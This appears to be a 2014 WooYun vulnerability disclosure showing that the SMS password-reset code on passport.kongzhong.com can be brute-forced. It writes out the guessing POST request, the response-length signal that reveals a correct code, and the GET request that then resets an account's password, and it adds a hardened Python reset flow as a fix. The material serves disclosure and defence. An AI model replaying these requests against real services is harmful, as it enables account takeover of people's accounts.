WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-01-16: Details have been sent to the vendor and are awaiting the vendor's handling.
2014-01-21: The vendor has chosen to ignore the vulnerability; the details are now disclosed to the public.
As the title says.
When recovering a password through the security phone, the 6-digit SMS verification code that is checked can be brute-forced.
POST /pwdback/pwdchange HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-powerpoint, application/vnd.ms-excel, */*
Referer: http://passport.kongzhong.com/pwdback/pwdmobileback/pwdback_mobile
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2)
Host: passport.kongzhong.com
Content-Length: 72
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ******
Connection: close

phone=<phone number>&vcode=<6-digit verification code>&pwdbackType=phone&useraccount=<account>

The response to the correct code has a different packet length, and it also returns a pagekey; the following GET request then resets the password:

GET /ajax/user/changepwd?useraccount=<phone number>&pwd=<new password>&repwd=<new password>&pagekey=BDNabARsU2UAMAFsW2oFbVMwUjUGMVsaACUHOAJvBmwAY1cNBngAbAVoDzoDYltxVG0DPwRqWz1SKVZiVzoBaAQwWm8EZVNgAC8BaltsBXhTM1I0BiZbawBsB2oCNQYyADxXZwZj&pwdbacktype=phone&sid= HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://passport.kongzhong.com/pwdback/pwdchange
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2)
Host: passport.kongzhong.com
Proxy-Connection: Keep-Alive
Cookie: ******

I suggest checking more thoroughly whether other places have the same defect.
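The two weaknesses in the flow above are an unlimited number of guesses at a 6-digit code and a reset key that is handed out once the code is accepted. The following is an added example (not code from the report or from the vendor) of a server-side reset flow that closes both: a per-account attempt cap and expiry on the SMS code, a constant-time comparison, and a single-use reset token bound to the account. All class and method names are hypothetical.

```python
import hmac
import secrets
import time

CODE_LENGTH = 6
MAX_ATTEMPTS = 5         # at most 5 guesses at a 6-digit code before it is discarded
CODE_TTL_SECONDS = 300   # code is only valid for 5 minutes after it is sent
TOKEN_TTL_SECONDS = 600  # reset token must be used within 10 minutes


class SmsResetFlow:
    """Hypothetical server-side state for an SMS-based password reset (example only)."""
    def __init__(self, clock=time.time):
        self._clock = clock
        self._codes = {}   # account -> [code, issued_at, failed_attempts]
        self._tokens = {}  # account -> (token, issued_at)

    def issue_code(self, account):
        # The code goes to the phone on file; it is never echoed in a response.
        code = "".join(secrets.choice("0123456789") for _ in range(CODE_LENGTH))
        self._codes[account] = [code, self._clock(), 0]
        return code

    def verify_code(self, account, submitted):
        # Returns a one-time reset token on success, None on every failure path.
        entry = self._codes.get(account)
        if entry is None:
            return None
        code, issued_at, failed = entry
        if self._clock() - issued_at > CODE_TTL_SECONDS:
            del self._codes[account]
            return None
        if not hmac.compare_digest(code.encode(), submitted.encode()):  # constant time
            entry[2] = failed + 1
            if entry[2] >= MAX_ATTEMPTS:
                del self._codes[account]   # too many misses: a fresh code must be requested
            return None
        del self._codes[account]           # a code is consumed on first success
        token = secrets.token_urlsafe(32)
        self._tokens[account] = (token, self._clock())
        return token

    def change_password(self, account, token, new_password):
        # Only the unexpired token issued to this very account is accepted, and only once.
        issued = self._tokens.get(account)
        if issued is None or self._clock() - issued[1] > TOKEN_TTL_SECONDS:
            return False
        if not hmac.compare_digest(issued[0].encode(), token.encode()):
            return False
        del self._tokens[account]          # single use; a replayed token is rejected
        return True
```

With the cap in place a guess has at most a 5-in-1,000,000 chance per issued code, and every failure path returns the same value so response shape no longer reveals a hit.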
Severity: no impact (vendor ignored)
Ignored on: 2014-01-21 10:21
2014-01-21: Thank you for your attention; we will fix it as soon as possible.